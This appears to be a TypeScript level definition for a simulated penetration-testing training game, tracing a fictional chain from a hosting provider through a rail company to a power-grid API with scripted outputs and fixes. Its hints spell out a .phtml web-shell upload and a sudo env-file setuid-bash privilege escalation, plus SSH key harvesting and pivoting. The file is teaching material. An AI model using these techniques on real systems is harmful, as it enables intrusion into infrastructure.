import type { ChainDef } from "../../types";
import { match, cmd, normalize } from "../../engine";

const IP_ATLAS = "192.0.2.10";
const IP_VANTAGE = "192.0.2.55";
const IP_CONTINENTAL = "192.0.2.201";

export const hardChain: ChainDef = {
  id: "hard-1",
  difficulty: "hard",
  order: 1,
  points: 300,
  title: "The Long Way In",
  codename: "OPERATION LOOSE MANIFEST // FOLLOW-UP",
  summary: "Three organizations. One real network foothold. Everything after that is patience.",
  briefing: [
    "Swift Transit's dispatch host had a line in its integrations file that nobody in that earlier",
    "engagement got to chase down: a standing connection into Continental Grid Interconnect, the",
    "regional authority that balances load across a chunk of the interstate power grid.",
    "",
    "You're not going in the front door. Continental Grid doesn't have one worth trying.",
    "Vantage Rail Logistics contracts their infrastructure to Atlas Cloud Partners, and Vantage",
    "holds a standing integration credential into Continental Grid's reporting systems.",
    "",
    "Atlas is your only real network foothold in this whole chain. Everything past that is",
    "privilege escalation, credential harvesting, and pivoting on what you find — the way almost",
    "every serious internal engagement actually goes. No shortcuts. Full methodology.",
    "",
    "Rule for this one, same as always: prove what's possible, touch nothing that doesn't need",
    "touching, and fix what you find.",
  ],
  debrief: [
    "One initial foothold — an unrestricted file upload on a support portal — turned into root on",
    "Atlas's host, a harvested SSH key, a jumpbox, an internal pivot, and finally an API credential",
    "with far more permission than it should have ever been issued.",
    "",
    "That's the whole discipline in one sentence: chain small, individually-unremarkable findings",
    "until they add up to something that matters. It's what OSCP-style methodology actually trains —",
    "not exploit trivia, but the patience to keep enumerating after the first shell.",
    "",
    "You had write access to live grid balancing setpoints at the end of this chain, and you didn't",
    "touch it. You filed the finding and locked the gateway instead. That's the job too.",
  ],
  nodes: [
    {
      id: "atlas",
      org: "Atlas Cloud Partners",
      city: "Fort Renner",
      state: "NE",
      coords: { x: 43.8, y: 22.5 },
      ip: IP_ATLAS,
      tagline: "Enterprise hosting & managed infrastructure",
      briefing: [
        "TARGET: Atlas Cloud Partners — hosts infrastructure for Vantage Rail Logistics",
        `IP: ${IP_ATLAS}`,
        "",
        "No known credentials. Full external assessment: recon, foothold, privilege escalation,",
        "and see what a root shell on a managed-hosting provider actually exposes about their clients.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Atlas does 'managed ops' for a handful of logistics and utility clients. If their",
        "   internal hygiene is as loose as their marketing copy, this won't take long.\"",
      ],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "webenum", label: "Locate the customer support portal's upload feature", tactic: "Discovery", requires: ["recon"] },
        { id: "foothold", label: "Get code execution via unrestricted file upload", tactic: "Initial Access", requires: ["webenum"] },
        { id: "privesc", label: "Escalate to root via a misconfigured sudo rule", tactic: "Privilege Escalation", requires: ["foothold"] },
        { id: "lateral-intel", label: "Harvest the SSH key used for Vantage Rail's jumpbox", tactic: "Credential Access", requires: ["privesc"] },
        { id: "secure", label: "Patch the upload flaw, fix the sudo rule, and rotate the key", tactic: "Remediation", requires: ["lateral-intel"] },
      ],
      hints: [
        "Recon first: `nmap -sV <ip>`.",
        "Check the web root, then look for a customer/support portal — that's usually where file uploads live.",
        "The upload endpoint only checks Content-Type, not the actual file extension. Upload a `.phtml` shell, then trigger it directly.",
        "Once you have a shell, always check `sudo -l` before you go looking for kernel exploits. Misconfigured sudo rules are far more common in the real world.",
        "The backup script runs as root but sources an environment file from a world-writable path first. If you control that file's contents, you control what runs as root — try: `echo 'cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash' > /tmp/backup.env && sudo /opt/atlas/scripts/backup.sh`",
        "As root, check what's sitting around in /root — hosting providers that do 'managed ops' for clients often leave client SSH keys lying around exactly there.",
      ],
      debrief: [
        "root cause #1: /support/upload validated Content-Type but not file extension — classic unrestricted file upload (OWASP A03/A04).",
        "root cause #2: /opt/atlas/scripts/backup.sh ran as root via a NOPASSWD sudo rule and sourced a world-writable env file before running.",
        "fix applied: upload validation hardened, sudo rule removed, world-writable path fixed, harvested key revoked.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP_ATLAS],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT    STATE SERVICE VERSION",
              "22/tcp  open  ssh     OpenSSH 9.2p1",
              "80/tcp  open  http    nginx 1.24.0 (redirects to 443)",
              "443/tcp open  https   nginx 1.24.0",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds",
            ],
          }),
        }),
        cmd({
          id: "find-support",
          tool: "curl",
          requires: ["support"],
          forbids: ["upload"],
          help: "curl https://<ip>/support     — check the customer support portal",
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "webenum",
            tone: "success",
            setsFlags: ["found_upload"],
            output: [
              "HTTP/1.1 200 OK",
              "<title>Atlas Cloud Partners — Support Portal</title>",
              "<form action=\"/support/upload\" method=\"POST\" enctype=\"multipart/form-data\">",
              "  <input type=\"file\" name=\"file\"> <!-- attach screenshots/logs -->",
              "</form>",
              "",
              "note: server-side comment in response headers — 'X-Upload-Check: content-type-only'",
            ],
          }),
        }),
        cmd({
          id: "upload",
          tool: "curl",
          requires: ["support/upload"],
          help: 'curl -F "file=@shell.phtml" https://<ip>/support/upload',
          requiresFlags: ["found_upload"],
          run: () => ({
            tone: "success",
            setsFlags: ["shell_uploaded"],
            output: [
              "HTTP/1.1 201 Created",
              '{"stored":"/uploads/shell.phtml"}',
              "",
              "[+] .phtml is executed by this server's PHP handler — content-type check offered no protection.",
            ],
          }),
        }),
        cmd({
          id: "trigger-shell",
          tool: "curl",
          requires: ["uploads/shell.phtml"],
          help: "curl \"https://<ip>/uploads/shell.phtml?cmd=whoami\"",
          requiresFlags: ["shell_uploaded"],
          run: () => ({
            completesObjective: "foothold",
            tone: "success",
            setsFlags: ["have_shell"],
            output: ["HTTP/1.1 200 OK", "www-data", "", "[+] code execution confirmed as www-data."],
          }),
        }),
        cmd({
          id: "sudo-l",
          tool: "sudo",
          requires: ["-l"],
          help: "sudo -l                — check what you can run as another user",
          requiresFlags: ["have_shell"],
          run: () => ({
            tone: "warn",
            setsFlags: ["saw_sudo_rule"],
            output: [
              "Matching Defaults entries for www-data on atlas-host:",
              "User www-data may run the following commands on atlas-host:",
              "    (root) NOPASSWD: /opt/atlas/scripts/backup.sh",
              "",
              "note: backup.sh sources /tmp/backup.env before running — and /tmp is world-writable.",
            ],
          }),
        }),
        {
          id: "privesc",
          tool: "echo",
          match: (input) => {
            const n = normalize(input);
            return n.includes("backup.env") && n.includes("backup.sh");
          },
          help: 'echo \'cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash\' > /tmp/backup.env && sudo /opt/atlas/scripts/backup.sh',
          requiresFlags: ["saw_sudo_rule"],
          deniedOutput: ["run `sudo -l` first — you need to know the rule exists before you can abuse it."],
          run: () => ({
            completesObjective: "privesc",
            tone: "success",
            setsFlags: ["root_access"],
            output: [
              "[backup.sh] sourcing /tmp/backup.env ...",
              "[backup.sh] running scheduled backup as root ...",
              "[+] /tmp/rootbash created, setuid root",
              "",
              "[+] root access confirmed via /tmp/rootbash -p",
            ],
          }),
        },
        cmd({
          id: "cat-key",
          tool: "cat",
          requires: ["vantage_jumpbox_key"],
          help: "cat /root/vantage_jumpbox_key    — see what's sitting in root's home",
          requiresFlags: ["root_access"],
          run: () => ({
            completesObjective: "lateral-intel",
            tone: "success",
            setsFlags: ["have_vantage_key"],
            note: `Vantage Rail jumpbox SSH key recovered — admin@${IP_VANTAGE} (use: ssh -i vantage_jumpbox_key admin@${IP_VANTAGE})`,
            output: [
              "-----BEGIN OPENSSH PRIVATE KEY-----",
              "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gt...",
              "-----END OPENSSH PRIVATE KEY-----",
              "",
              `# admin@vantage-jump (${IP_VANTAGE}) — placed here 2024-11-02 by 'atlas-ops' during`,
              "# a joint maintenance window. never removed after the ticket closed.",
              "",
              "[+] SSH key for Vantage Rail Logistics' admin jumpbox recovered.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — fix the upload flaw, the sudo rule, and revoke the key",
          requiresObjectives: ["lateral-intel"],
          deniedOutput: ["harvest what a root shell here actually exposes before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] upload endpoint now validates file extension + content, not just Content-Type",
              "[+] removed the NOPASSWD sudo rule; backup.sh no longer sources an external env file",
              "[+] revoked the harvested Vantage Rail jumpbox key, notified Vantage Rail Logistics",
              "",
              "ATLAS CLOUD PARTNERS: SECURED",
            ],
          }),
        },
      ],
    },
    {
      id: "vantage",
      org: "Vantage Rail Logistics",
      city: "Cutler Springs",
      state: "MO",
      coords: { x: 55.4, y: 31.2 },
      ip: IP_VANTAGE,
      randomizableSecrets: ["cgi_rpt_3d91ffa02b6c"],
      tagline: "Regional rail freight dispatch & scheduling",
      briefing: [
        "TARGET: Vantage Rail Logistics — internal network, reached via a harvested jumpbox key",
        `ENTRY: ${IP_VANTAGE} (admin jumpbox)`,
        "",
        "This is an internal pivot exercise. The jumpbox has almost nothing on it by design —",
        "your job is to enumerate what it can reach, not what it contains.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Jumpboxes are usually hardened but rarely isolated well enough. Whatever admin",
        "   account uses this box for daily work has probably left something cached.\"",
      ],
      objectives: [
        { id: "recon", label: "Enumerate the jumpbox's exposed services", tactic: "Reconnaissance" },
        { id: "pivot-auth", label: "Authenticate to the jumpbox using the harvested key", tactic: "Initial Access", requires: ["recon"] },
        { id: "internal-enum", label: "Identify an internal host reachable from the jumpbox", tactic: "Discovery", requires: ["pivot-auth"] },
        { id: "lateral-hop", label: "Pivot to the internal ops-dispatch server", tactic: "Lateral Movement", requires: ["internal-enum"] },
        { id: "loot-grid-cred", label: "Recover the Continental Grid Interconnect integration credential", tactic: "Credential Access", requires: ["lateral-hop"] },
        { id: "secure", label: "Restrict jumpbox access and rotate every credential found here", tactic: "Remediation", requires: ["loot-grid-cred"] },
      ],
      hints: [
        "Recon the jumpbox itself first — `nmap -sV <ip>`. Notice how little is actually open.",
        "Use the key you harvested from Atlas: `ssh -i vantage_jumpbox_key admin@<ip>`.",
        "Once you're on the jumpbox, check what internal hosts it knows about — `cat /etc/hosts` is a fast first move.",
        "The jumpbox is used daily for admin work — check for a cached SSH key under the admin's home directory before assuming you need a password.",
        "You're on the internal ops-dispatch server now. Look for a config or credentials file related to external integrations — this company reports load data somewhere.",
        "You've confirmed a real, working credential into a power grid authority's systems from a rail logistics jumpbox three hops away. Lock this whole path down.",
      ],
      debrief: [
        "root cause: a maintenance-window SSH key was never revoked after the ticket closed, and the",
        "jumpbox's own admin account had a cached internal key with no additional authentication",
        "required to reach the internal ops-dispatch server — no MFA, no jump-host session boundary.",
        "fix applied: harvested key revoked, jumpbox->internal access restricted and requires MFA,",
        "all discovered credentials rotated.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP_VANTAGE],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT   STATE SERVICE VERSION",
              "22/tcp open  ssh     OpenSSH 9.2p1",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds",
              "note: minimal attack surface — this box is a jumpbox, not a target in itself.",
            ],
          }),
        }),
        cmd({
          id: "ssh-jumpbox",
          tool: "ssh",
          requires: ["vantage_jumpbox_key"],
          help: "ssh -i vantage_jumpbox_key admin@<ip>",
          requiresObjectives: ["recon"],
          requiresFlags: ["have_vantage_key"],
          deniedOutput: ["Permission denied (publickey). — you need the harvested Atlas key for this."],
          run: () => ({
            completesObjective: "pivot-auth",
            tone: "success",
            setsFlags: ["on_jumpbox"],
            promptAfter: "admin@vantage-jump:~$",
            output: [
              "Authenticated with partial success.",
              "Last login: Tue Nov 5 08:14:02 2024 from 198.51.100.9",
              "",
              "[+] shell access on the Vantage Rail Logistics admin jumpbox.",
            ],
          }),
        }),
        cmd({
          id: "cat-hosts",
          tool: "cat",
          requires: ["/etc/hosts"],
          help: "cat /etc/hosts         — see what internal hosts this box knows about",
          requiresFlags: ["on_jumpbox"],
          run: () => ({
            completesObjective: "internal-enum",
            tone: "success",
            setsFlags: ["know_ops_host"],
            note: "Vantage internal host: ops-dispatch.internal = 10.20.4.15",
            output: [
              "127.0.0.1       localhost",
              "10.20.4.15      ops-dispatch.internal ops-dispatch",
              "10.20.4.2       fileserver.internal",
              "",
              "[+] ops-dispatch.internal (10.20.4.15) looks like the actual dispatch/ops server.",
            ],
          }),
        }),
        cmd({
          id: "ssh-internal",
          tool: "ssh",
          requires: ["ops-dispatch"],
          help: "ssh ops@ops-dispatch.internal   — pivot to the internal ops server",
          requiresFlags: ["know_ops_host"],
          deniedOutput: ["ssh: Could not resolve hostname — you don't know this host exists yet."],
          run: () => ({
            completesObjective: "lateral-hop",
            tone: "success",
            setsFlags: ["on_ops_server"],
            promptAfter: "ops@ops-dispatch:~$",
            output: [
              "Authenticated using cached key from admin's ~/.ssh/ — no additional auth required.",
              "Last login: Mon Nov 4 22:51:10 2024",
              "",
              "[+] shell access on ops-dispatch.internal (10.20.4.15).",
            ],
          }),
        }),
        cmd({
          id: "cat-grid-conf",
          tool: "cat",
          requires: ["grid_interconnect.conf"],
          help: "cat /opt/vantage/integrations/grid_interconnect.conf",
          requiresFlags: ["on_ops_server"],
          run: () => ({
            completesObjective: "loot-grid-cred",
            tone: "success",
            setsFlags: ["have_grid_cred"],
            note: "Continental Grid Interconnect cred — vantage-rail-reporting : cgi_rpt_3d91ffa02b6c (scope: load-report:write — looks over-scoped)",
            output: [
              "# Continental Grid Interconnect — load reporting integration",
              `endpoint = https://${IP_CONTINENTAL}/api/reporting`,
              'client_id = "vantage-rail-reporting"',
              'client_secret = "cgi_rpt_3d91ffa02b6c"',
              "scope = load-report:write   # NOTE: should be load-report:submit-only per CGI onboarding doc",
              "",
              "[+] credential for Continental Grid Interconnect's reporting API recovered.",
              "[!] the scope on this credential looks broader than a reporting-only integration should have.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — lock down the pivot path and rotate credentials",
          requiresObjectives: ["loot-grid-cred"],
          deniedOutput: ["trace the credential all the way to what it actually grants before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] revoked the harvested jumpbox key",
              "[+] required MFA for jumpbox -> internal network access",
              "[+] rotated the ops-dispatch cached SSH key",
              "[+] flagged the Continental Grid Interconnect credential's excess scope for the final report",
              "",
              "VANTAGE RAIL LOGISTICS: SECURED",
            ],
          }),
        },
      ],
    },
    {
      id: "continental",
      org: "Continental Grid Interconnect",
      city: "Ashford Crossing",
      state: "OH",
      coords: { x: 72.9, y: 23.3 },
      ip: IP_CONTINENTAL,
      tagline: "Regional load-balancing authority",
      briefing: [
        "TARGET: Continental Grid Interconnect — reporting API gateway",
        `IP: ${IP_CONTINENTAL}`,
        "YOU HAVE: a valid but suspiciously over-scoped reporting credential from Vantage Rail.",
        "",
        "Confirm what that credential can actually do. Prove the finding without ever exercising it",
        "for real — this is the one target in the whole game where 'just try it' is not the job.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Last stop. Confirm the scope, document it, close it. Do not touch a live setpoint.",
        "   That's not a game rule — that's the actual rule.\"",
      ],
      objectives: [
        { id: "recon", label: "Enumerate the reporting API gateway", tactic: "Reconnaissance" },
        { id: "auth", label: "Authenticate to the reporting API with the Vantage Rail credential", tactic: "Initial Access", requires: ["recon"] },
        {
          id: "confirm-impact",
          label: "Confirm the credential's write scope without exercising it",
          tactic: "Discovery",
          requires: ["auth"],
        },
        { id: "secure", label: "Revoke the over-scoped credential and enforce least privilege", tactic: "Remediation", requires: ["confirm-impact"] },
      ],
      hints: [
        "Recon the gateway — `nmap -sV <ip>`.",
        "Authenticate to the reporting API using the client_id/client_secret from Vantage Rail's config, as an Authorization header.",
        "Don't call PUT or DELETE on anything live. Send an OPTIONS request against the setpoints endpoint — it will tell you what methods the credential is allowed to use without you ever invoking them: `curl -X OPTIONS -H \"Authorization: Bearer cgi_rpt_...\" https://<ip>/api/setpoints/midwest-3`.",
        "You've confirmed the scope is broader than it should be. File the fix.",
      ],
      debrief: [
        "root cause: an integration credential scoped for 'load-report:submit-only' was actually issued",
        "with 'load-report:write' at the gateway, granting it PUT/DELETE on live balancing setpoints —",
        "a broken function-level authorization issue (OWASP API5) three organizations removed from where",
        "the credential was created.",
        "fix applied: credential revoked and reissued with correct scope; gateway now enforces scope",
        "server-side instead of trusting the client_id's self-reported role.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP_CONTINENTAL],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT    STATE SERVICE VERSION",
              "443/tcp open  https   nginx 1.24.0 (api gateway)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds",
              "note: everything else is filtered. this gateway is the only reachable surface, as expected",
              "for a utility-adjacent target.",
            ],
          }),
        }),
        cmd({
          id: "auth-reporting",
          tool: "curl",
          requires: ["authorization", "api/reporting"],
          forbids: ["setpoints"],
          help: 'curl -H "Authorization: Bearer cgi_rpt_..." https://<ip>/api/reporting/status',
          requiresObjectives: ["recon"],
          requiresFlags: ["have_grid_cred"],
          deniedOutput: ["401 Unauthorized — you don't have a credential for this gateway."],
          run: () => ({
            completesObjective: "auth",
            tone: "success",
            setsFlags: ["api_authed"],
            output: [
              '{"status":"ok","client_id":"vantage-rail-reporting","gateway":"cgi-reporting-gw v6.0"}',
              "",
              "response header: Allow-Methods-Hint: see OPTIONS /api/setpoints/{region}",
            ],
          }),
        }),
        cmd({
          id: "confirm-scope",
          tool: "curl",
          requires: ["options", "setpoints"],
          help: 'curl -X OPTIONS -H "Authorization: Bearer cgi_rpt_..." https://<ip>/api/setpoints/midwest-3',
          requiresFlags: ["api_authed"],
          deniedOutput: ["authenticate to the reporting API first."],
          run: () => ({
            completesObjective: "confirm-impact",
            tone: "warn",
            setsFlags: ["proved_write_scope"],
            note: "Continental Grid gateway: vantage-rail-reporting credential is over-scoped (Allow: GET, PUT, DELETE on /api/setpoints) — flagged for revocation, never exercised.",
            output: [
              "HTTP/1.1 204 No Content",
              "Allow: GET, PUT, DELETE",
              "",
              "[!] this reporting-scoped credential is authorized for PUT and DELETE on live grid",
              "    balancing setpoints. no request beyond OPTIONS was sent — impact confirmed without",
              "    ever touching a live value.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — revoke the credential and enforce least privilege",
          requiresObjectives: ["confirm-impact"],
          deniedOutput: ["confirm the actual scope of the credential before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] revoked client 'vantage-rail-reporting' at the gateway",
              "[+] reissued with load-report:submit-only, enforced server-side regardless of client claims",
              "[+] full chain finding filed: Atlas -> Vantage Rail -> Continental Grid Interconnect",
              "",
              "CONTINENTAL GRID INTERCONNECT: SECURED",
              "",
              "=== CHAIN COMPLETE ===",
            ],
          }),
        },
      ],
    },
  ],
};
